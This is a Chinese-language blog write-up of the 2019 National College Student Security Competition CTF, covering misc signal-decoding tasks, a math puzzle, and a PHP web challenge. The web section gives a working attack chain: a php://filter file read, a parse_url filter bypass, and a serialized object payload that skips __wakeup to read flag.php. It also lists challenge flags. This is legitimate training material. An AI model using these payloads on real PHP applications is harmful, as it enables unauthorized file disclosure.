
 <!DOCTYPE HTML>
<html lang="en">
<head>
  <meta charset="UTF-8">
  
    <title>第十二届全国大学生安全竞赛 | Specter&#39;s Blog</title>
    <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no">
    
    <meta name="author" content="specter">
    

    
    <meta name="description" content="前言上周末刚打完的比赛，就得了200多分">
<meta property="og:type" content="article">
<meta property="og:title" content="第十二届全国大学生安全竞赛">
<meta property="og:url" content="http://example.com/2019/04/23/%E5%A4%A7%E5%AD%A6CTF/%E7%AC%AC%E5%8D%81%E4%BA%8C%E5%B1%8A%E5%85%A8%E5%9B%BD%E5%A4%A7%E5%AD%A6%E7%94%9F%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/index.html">
<meta property="og:site_name" content="Specter&#39;s Blog">
<meta property="og:description" content="前言上周末刚打完的比赛，就得了200多分">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EAzr1s.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EAzcn0.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EAz27T.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EAzx9H.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EESpjI.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EESPDP.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EESAUS.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EESY8J.png">
<meta property="og:image" content="c:/Users/17295/AppData/Roaming/Typora/typora-user-images/1556008774434.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EESBVK.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EEp3Lt.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EEp0Qs.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EEiSmR.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EEiV6H.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EEYZ01.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EEtiUP.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EEtVgg.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/04/23/EENcWT.png">
<meta property="article:published_time" content="2019-04-23T07:38:27.000Z">
<meta property="article:modified_time" content="2021-05-23T10:27:57.143Z">
<meta property="article:author" content="specter">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/04/23/EAzr1s.png">

    
    <link rel="alternative" href="/atom.xml" title="Specter&#39;s Blog" type="application/atom+xml">
    
    
    <link rel="icon" href="/img/tou1.png">
    
    
    <link rel="apple-touch-icon" href="/img/jacman.jpg">
    <link rel="apple-touch-icon-precomposed" href="/img/jacman.jpg">
    
    
<link rel="stylesheet" href="/css/style.css">
<link rel="stylesheet" href="/%02.css">
<link rel="stylesheet" href="/.css">

<meta name="generator" content="Hexo 5.4.0"></head>

  <body>
    <header>
      
<div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo.jpg" alt="Specter&#39;s Blog" title="Specter&#39;s Blog"/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="Specter&#39;s Blog">Specter&#39;s Blog</a></h1>
				<h2 class="blog-motto"></h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					<ul>
					 
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
						<li><a href="/about">About</a></li>
					
						<li><a href="/tags">Tags</a></li>
					
						<li><a href="/categories">Categories</a></li>
					
					<li>
 					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="search" id="search" name="q" autocomplete="off" maxlength="20" placeholder="Search" />
						<input type="hidden" name="q" value="site:example.com">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>
    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
  
	<article itemprop="articleBody"> 
		<header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2019/04/23/大学CTF/第十二届全国大学生安全竞赛/" title="第十二届全国大学生安全竞赛" itemprop="url">第十二届全国大学生安全竞赛</a>
  </h1>
  <p class="article-author">By
       
		<a href="/about" title="specter" target="_blank" itemprop="author">specter</a>
		
  <p class="article-time">
    <time datetime="2019-04-23T07:38:27.000Z" itemprop="datePublished"> Published 2019-04-23</time>
    
  </p>
</header>
	<div class="article-content">
		
		<div id="toc" class="toc-article">
			<strong class="toc-title">Contents</strong>
		
			<ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A3%E6%96%87"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Misc"><span class="toc-number">2.1.</span> <span class="toc-text">Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%AD%BE%E5%88%B0%E9%A2%98"><span class="toc-number">2.1.1.</span> <span class="toc-text">签到题</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#saleae"><span class="toc-number">2.1.2.</span> <span class="toc-text">saleae</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#24c"><span class="toc-number">2.1.3.</span> <span class="toc-text">24c</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#badusb"><span class="toc-number">2.1.4.</span> <span class="toc-text">badusb</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Crypto"><span class="toc-number">2.2.</span> <span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#puzzle"><span class="toc-number">2.2.1.</span> <span class="toc-text">puzzle</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Web"><span class="toc-number">2.3.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#Justsoso"><span class="toc-number">2.3.1.</span> <span class="toc-text">Justsoso</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%85%A8%E5%AE%87%E5%AE%99%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84SQL"><span class="toc-number">2.3.2.</span> <span class="toc-text">全宇宙最简单的SQL</span></a></li></ol></li></ol></li></ol>
		
		</div>
		
		<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>上周末刚打完的比赛，就得了200多分<span id="more"></span></p>
<h3 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h3><h4 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h4><h5 id="签到题"><a href="#签到题" class="headerlink" title="签到题"></a>签到题</h5><p>题目叫“三人行必有flag”，三个人站在摄像头前面，就可以拿到flag了。</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EAzr1s.png" alt="EAzr1s.png"></p>
<p>flag{87e37d95-6a48-4463-aff8-b0dbd27d3b7d}</p>
<h5 id="saleae"><a href="#saleae" class="headerlink" title="saleae"></a>saleae</h5><p>第一次见到这样的题，在百度上找了好久，也没找到个靠谱的教程，下载了logic后也不会用，不会分析数据，这道题完全是手刷的，按照下面这样读出来的</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EAzcn0.png" alt="EAzcn0.png"></p>
<p><img src="https://s2.ax1x.com/2019/04/23/EAz27T.png" alt="EAz27T.png"></p>
<p>然后一个一个转化成十六进制，再转字符串。注意：二进制串顺序是逆序。</p>
<p>期间错了几次，改了好几次才改对。</p>
<p>flag{12071397-19d1-48e6-be8c-784b89a95e07}</p>
<p>后来才知道正确的做法，点击Analyze–&gt;SPI</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EAzx9H.png" alt="EAzx9H.png"></p>
<p>设好时钟脉冲和数据脉冲，没有的设成None</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EESpjI.png" alt="EESpjI.png"></p>
<p>开始输入的是二进制，然后转换成ascii</p>
<p><a target="_blank" rel="noopener" href="https://imgchr.com/i/EESPDP"><img src="https://s2.ax1x.com/2019/04/23/EESPDP.png" alt="EESPDP.png"></a></p>
<p>得到flag</p>
<p><a target="_blank" rel="noopener" href="https://imgchr.com/i/EESAUS"><img src="https://s2.ax1x.com/2019/04/23/EESAUS.png" alt="EESAUS.png"></a></p>
<h5 id="24c"><a href="#24c" class="headerlink" title="24c"></a>24c</h5><p>这道题没法用手刷，读出来，所以当时没做出来，现在看看，好简单啊，，，，</p>
<p>题目是24c，这次选择I2c，直接save</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EESY8J.png" alt="EESY8J.png"></p>
<p><img src="C:\Users\17295\AppData\Roaming\Typora\typora-user-images\1556008774434.png" alt="1556008774434"></p>
<p>再转成ascii，看到flag</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EESBVK.png" alt="EESBVK.png"></p>
<p>但是这里，不是简单地拼接字符串就对的，而是有一定的拼接规则。具体的百度吧，我也不懂这个。</p>
<h5 id="badusb"><a href="#badusb" class="headerlink" title="badusb"></a>badusb</h5><p>和第一题一样，SPI分析，设置如下：</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EEp3Lt.png" alt="EEp3Lt.png"></p>
<p>在最下面找到flag</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EEp0Qs.png" alt="EEp0Qs.png"></p>
<h4 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h4><h5 id="puzzle"><a href="#puzzle" class="headerlink" title="puzzle"></a>puzzle</h5><p><strong>puestion0</strong></p>
<p>解这个四元一次方程组，用python的numpy库</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> numpy</span><br><span class="line"></span><br><span class="line">a=[[<span class="number">13627</span>,<span class="number">26183</span>,<span class="number">35897</span>,<span class="number">48119</span>],</span><br><span class="line">[<span class="number">23027</span>,<span class="number">38459</span>,<span class="number">40351</span>,<span class="number">19961</span>],</span><br><span class="line">[<span class="number">36013</span>,<span class="number">45589</span>,<span class="number">17029</span>,<span class="number">27823</span>],</span><br><span class="line">[<span class="number">43189</span>,<span class="number">12269</span>,<span class="number">21587</span>,<span class="number">33721</span>]]</span><br><span class="line"></span><br><span class="line">b=[<span class="number">347561292</span>,<span class="number">361760202</span>,<span class="number">397301762</span>,<span class="number">350830412</span>]</span><br><span class="line"></span><br><span class="line">a=numpy.array(a)</span><br><span class="line">b=numpy.array(b)</span><br><span class="line"></span><br><span class="line">result=numpy.linalg.solve(a,b)</span><br><span class="line"><span class="built_in">print</span> result</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.ax1x.com/2019/04/23/EEiSmR.png" alt="EEiSmR.png"></p>
<p>或者是z3库</p>
<p>要求转成十六进制后拼接，得到<code>fa6bed9c7a00</code></p>
<p><strong>question1</strong></p>
<p>这是一个素数序列找规律的题目，在26000000与26500000素数中每间隔固定个数取一个值（间隔是36个），全部的素数序列网站如下</p>
<p><a target="_blank" rel="noopener" href="http://smallprimenumber.blogspot.com/2008/12/prime-number-from-26000000-to-26500000.html">http://smallprimenumber.blogspot.com/2008/12/prime-number-from-26000000-to-26500000.html</a></p>
<p>只要按照该规则寻找即可：</p>
<p>26364803 <strong>26364809</strong> 26364823 26364827 26364847 </p>
<p>26364881 26364889 26364893 26364901 26364931 </p>
<p>26364941 26364967 26364983 26364991 26364997 </p>
<p>26365007 26365021 26365037 26365039 26365049 </p>
<p>26365057 26365081 26365099 26365109 26365111 </p>
<p>26365123 26365133 26365139 26365169 26365177 </p>
<p>26365187 26365231 26365243 26365289 26365301 </p>
<p>26365333 26365363 26365393 <strong>26365399</strong> 26365403 </p>
<p>26365421 26365463 26365511 26365517 26365519 </p>
<p>26365523 26365541 26365561 26365601 26365607 </p>
<p>26365621 26365643 26365649 26365681 26365721 </p>
<p>26365733 26365741 26365771 26365777 26365783 </p>
<p>26365789 26365799 26365811 26365817 26365819 </p>
<p>26365873 26365877 26365883 26365891 26365909 </p>
<p>26365943 26365987 26365991 26366003 26366023 </p>
<p><strong>26366033</strong> 26366059 26366071 26366077 26366117 </p>
<p>26366141 26366147 26366149 26366159 26366173 </p>
<p>26366189 26366203 26366227 26366231 26366233 </p>
<p>26366273 26366287 26366317 26366323 26366341 </p>
<p>26366369 26366383 26366393 26366407 26366419 </p>
<p>26366429 26366447 26366453 26366477 26366491 </p>
<p>26366497 26366503 26366537 26366551 26366581 </p>
<p>26366591 26366603 <strong>26366621</strong> 26366633 26366663 </p>
<p>∴Part1 = 26365399     十六进制<code>1924dd7</code></p>
<p><strong>question2,3,4</strong></p>
<p>数学和物理的知识了</p>
<p>第一就是简单的求极限和积分。 <code>part2=(1+91+7+1)*77=7700</code> 转换十六进制 <code>part2=1e14</code></p>
<p>第三题是一道物理题目</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EEiV6H.png" alt="EEiV6H.png"></p>
<p>代入数据，最后得到结果<code>part3=18640</code>十六进制 <code>48d0</code></p>
<p>第四题考的是三重积分</p>
<p>求得<code>part4=40320</code> ，十六进制<code>part4=9d80</code></p>
<p>拼接得到flag：flag{01924dd7-1e14-48d0-9d80-fa6bed9c7a00}</p>
<h4 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h4><h5 id="Justsoso"><a href="#Justsoso" class="headerlink" title="Justsoso"></a>Justsoso</h5><p>知识点：任意文件读取，PHP 反序列化</p>
<p>查看源码，发现有hint.php，<code>/?file=php://filter/read=convert.base64-encode/resource=hint.php</code>，读取hint.php源码看看，base64解码后</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Handle</span></span>&#123; </span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$handle</span>;  </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="keyword">foreach</span>(get_object_vars(<span class="keyword">$this</span>) <span class="keyword">as</span> <span class="variable">$k</span> =&gt; <span class="variable">$v</span>) &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;<span class="variable">$k</span> = <span class="literal">null</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$handle</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;handle = <span class="variable">$handle</span>; </span><br><span class="line">    &#125; </span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;handle-&gt;getFlag();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Flag</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$token</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$token_flag</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$file</span></span>)</span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;file = <span class="variable">$file</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;__construct&#x27;</span>;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;token_flag = <span class="keyword">$this</span>-&gt;token = md5(rand(<span class="number">1</span>,<span class="number">10000</span>));</span><br><span class="line">    &#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;token_flag = md5(rand(<span class="number">1</span>,<span class="number">10000</span>));</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;token === <span class="keyword">$this</span>-&gt;token_flag)</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;file))&#123;</span><br><span class="line">				<span class="keyword">echo</span> @highlight_file(<span class="keyword">$this</span>-&gt;file,<span class="literal">true</span>); </span><br><span class="line">            &#125;  </span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>/?file=php://filter/read=convert.base64-encode/resource=index.php</code>，读取index.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">error_reporting(0); </span><br><span class="line">$file = $_GET[&quot;file&quot;]; </span><br><span class="line">$payload = $_GET[&quot;payload&quot;];</span><br><span class="line">if(!isset($file))&#123;</span><br><span class="line">    echo &#x27;Missing parameter&#x27;.&#x27;&lt;br&gt;&#x27;;</span><br><span class="line">&#125;</span><br><span class="line">if(preg_match(&quot;/flag/&quot;,$file))&#123;</span><br><span class="line">    die(&#x27;hack attacked!!!&#x27;);</span><br><span class="line">&#125;</span><br><span class="line">@include($file);</span><br><span class="line">if(isset($payload))&#123;  </span><br><span class="line">    $url = parse_url($_SERVER[&#x27;REQUEST_URI&#x27;]);</span><br><span class="line">    parse_str($url[&#x27;query&#x27;],$query);</span><br><span class="line">    foreach($query as $value)&#123;</span><br><span class="line">        if (preg_match(&quot;/flag/&quot;,$value)) &#123; </span><br><span class="line">            die(&#x27;stop hacking!&#x27;);</span><br><span class="line">            exit();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    $payload = unserialize($payload);</span><br><span class="line">&#125;else&#123; </span><br><span class="line">   echo &quot;Missing parameters&quot;; </span><br><span class="line">&#125; </span><br><span class="line">?&gt;</span><br><span class="line">&lt;!--Please test index.php?file=xxx.php --&gt;</span><br><span class="line">&lt;!--Please get the source of hint.php--&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>审计一下代码</p>
<p><code>preg_match(&quot;/flag/&quot;,$value)</code>我们需要绕过此处对flag的过滤，搜索资料可知parse_url函数存在解析漏洞，如果我们的网址为<a target="_blank" rel="noopener" href="http://ip/www%E9%82%A3%E4%B9%88%E5%8F%AF%E4%BB%A5%E6%AD%A3%E5%B8%B8%E8%A7%A3%E6%9E%90%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%88%91%E4%BB%AC%E8%BE%93%E5%85%A5%E7%9A%84%E6%98%AFhttp://ip///www%E5%B0%B1%E4%BC%9A%E8%BF%94%E5%9B%9Efalse%E4%BB%8E%E8%80%8C%E5%AF%BC%E8%87%B4%E5%90%8E%E9%9D%A2%E7%9A%84%E8%BF%87%E6%BB%A4">http://ip/www那么可以正常解析，如果我们输入的是http://ip///www就会返回false从而导致后面的过滤</a></p>
<p>index.php 有 file 和 payload 两个参数，先 include 了 file 所指向的文件，再经过一系列的检测之后 反序列化 payload。</p>
<p>然后 hint.php 有两个类 Handle 和 Flag。 对于 Handle 类，它的魔术方法 Weakup  会清空其自身的成员变量，将其都置为 null。而其析构函数则会调用自身成员变量 handle 的 getFlag 方法。而 Flag 类就有这个  getFlag 方法了，其中会随机一个 md5(1~10000随机数) 的 flag_token，和自身的 token  做比较，相等就去读文件。看起来我们可以用这里来读 flag.php 文件了。</p>
<p>总结一下有三个需要处理的地方</p>
<blockquote>
<p><strong>绕过对flag的过滤</strong>   preg_match(“/flag/“,$value)</p>
<p><strong>绕过wakeup()</strong>    foreach(get_object_vars($this) as $k =&gt; $v) {<br>            $this-&gt;$k = null;<br>        }</p>
<p><strong>使$this-&gt;token === $this-&gt;token_flag，也就是绕过md5(rand(1,10000))</strong></p>
</blockquote>
<p>绕过preg_match(“/flag/“,$value)，利用parse_url函数存在解析漏洞</p>
<p>绕过wakeup()需要使序列化后串的的属性个数大于实际属性个数</p>
<p>绕过md5(rand(1,10000))，只需要使用一个引用即可，</p>
<p>构造payload：</p>
<p>在hint.php源码下面添加如下代码，然后本地执行：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$flag</span>=<span class="keyword">new</span> Flag(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="variable">$flag</span>-&gt;token=&amp;<span class="variable">$flag</span>-&gt;token_flag;</span><br><span class="line"><span class="variable">$handle</span>=<span class="keyword">new</span> Handle(<span class="variable">$a</span>);</span><br><span class="line">print_r(serialize(<span class="variable">$handle</span>));</span><br></pre></td></tr></table></figure>

<p>出现了不可见字符，</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EEYZ01.png" alt="EEYZ01.png"></p>
<p>只好再url编码一次了，在上面添加</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$flag</span>=<span class="keyword">new</span> Flag(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="variable">$flag</span>-&gt;token=&amp;<span class="variable">$flag</span>-&gt;token_flag;</span><br><span class="line"><span class="variable">$handle</span>=<span class="keyword">new</span> Handle(<span class="variable">$a</span>);</span><br><span class="line">print_r(urlencode(serialize(<span class="variable">$handle</span>)));</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.ax1x.com/2019/04/23/EEtiUP.png" alt="EEtiUP.png"></p>
<p>此时的payload已经可以绕过反序列化和md5(rand(1,10000))了，但是还需要绕过wakeup()和preg_match(“/flag/“,$value)，首先是上面提到的，更改这个值(代表类中的属性个数)，使这个值大于真实值1即可，这里我们改成2，然后就是利用parse_url函数解析漏洞</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EEtVgg.png" alt="EEtVgg.png"></p>
<p>payload：</p>
<p><code>///?file=hint.php&amp;payload=O%3A6%3A%22Handle%22%3A2%3A%7Bs%3A14%3A%22%00Handle%00handle%22%3BO%3A4%3A%22Flag%22%3A3%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22token%22%3Bs%3A32%3A%22f19ec2b84181033bf4753a5a51d5d608%22%3Bs%3A10%3A%22token_flag%22%3BR%3A4%3B%7D%7D</code></p>
<p>flag{d0ed48b8-62be-4656-87fd-f78724183084}</p>
<p>本地phpstudy复现结果，</p>
<p><img src="https://s2.ax1x.com/2019/04/23/EENcWT.png" alt="EENcWT.png"></p>
<h5 id="全宇宙最简单的SQL"><a href="#全宇宙最简单的SQL" class="headerlink" title="全宇宙最简单的SQL"></a>全宇宙最简单的SQL</h5><p><a target="_blank" rel="noopener" href="https://www.ctfwp.com/articals/2019national.html">https://www.ctfwp.com/articals/2019national.html</a></p>
  
	</div>
		<footer class="article-footer clearfix">
<div class="article-catetags">

<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/CTF/">CTF</a>
</div>


</div>



	<div class="article-share" id="share">
	
	  <div data-url="http://example.com/2019/04/23/%E5%A4%A7%E5%AD%A6CTF/%E7%AC%AC%E5%8D%81%E4%BA%8C%E5%B1%8A%E5%85%A8%E5%9B%BD%E5%A4%A7%E5%AD%A6%E7%94%9F%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B/" data-title="第十二届全国大学生安全竞赛 | Specter&#39;s Blog" data-tsina="" class="share clearfix">
	  </div>
	
	</div>


</footer>

   	       
	</article>
	
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2019/04/25/大学CTF/记攻防世界几个有意思的MISC/" title="记攻防世界几个有意思的MISC">
  <strong>上一篇：</strong><br/>
  <span>
  记攻防世界几个有意思的MISC</span>
</a>
</div>


<div class="next">
<a href="/2019/04/18/大学CTF/攻防世界xctf之web/"  title="攻防世界xctf之web">
 <strong>下一篇：</strong><br/> 
 <span>攻防世界xctf之web
</span>
</a>
</div>

</nav>

	



</div>  
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

  <div id="toc" class="toc-aside">
  <strong class="toc-title">Contents</strong>
 
 <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A3%E6%96%87"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Misc"><span class="toc-number">2.1.</span> <span class="toc-text">Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%AD%BE%E5%88%B0%E9%A2%98"><span class="toc-number">2.1.1.</span> <span class="toc-text">签到题</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#saleae"><span class="toc-number">2.1.2.</span> <span class="toc-text">saleae</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#24c"><span class="toc-number">2.1.3.</span> <span class="toc-text">24c</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#badusb"><span class="toc-number">2.1.4.</span> <span class="toc-text">badusb</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Crypto"><span class="toc-number">2.2.</span> <span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#puzzle"><span class="toc-number">2.2.1.</span> <span class="toc-text">puzzle</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Web"><span class="toc-number">2.3.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#Justsoso"><span class="toc-number">2.3.1.</span> <span class="toc-text">Justsoso</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%85%A8%E5%AE%87%E5%AE%99%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84SQL"><span class="toc-number">2.3.2.</span> <span class="toc-text">全宇宙最简单的SQL</span></a></li></ol></li></ol></li></ol>
 
  </div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">

  


  
<div class="categorieslist">
	<p class="asidetitle">Categories</p>
		<ul>
		
		  
			<li><a href="/categories/CTF/" title="CTF">CTF<sup>10</sup></a></li>
		  
		
		  
			<li><a href="/categories/IoT/" title="IoT">IoT<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/Linux/" title="Linux">Linux<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/Other/" title="Other">Other<sup>24</sup></a></li>
		  
		
		  
			<li><a href="/categories/SQL/" title="SQL">SQL<sup>3</sup></a></li>
		  
		
		  
			<li><a href="/categories/Sec/" title="Sec">Sec<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/ctf/" title="ctf">ctf<sup>21</sup></a></li>
		  
		
		</ul>
</div>


  
<div class="tagslist">
	<p class="asidetitle">Tags</p>
		<ul class="clearfix">
		
			
				<li><a href="/tags/ctf/" title="ctf">ctf<sup>21</sup></a></li>
			
		
			
				<li><a href="/tags/buuctf/" title="buuctf">buuctf<sup>6</sup></a></li>
			
		
			
				<li><a href="/tags/Java/" title="Java">Java<sup>5</sup></a></li>
			
		
			
				<li><a href="/tags/SQLi/" title="SQLi">SQLi<sup>3</sup></a></li>
			
		
			
				<li><a href="/tags/SQL/" title="SQL">SQL<sup>3</sup></a></li>
			
		
			
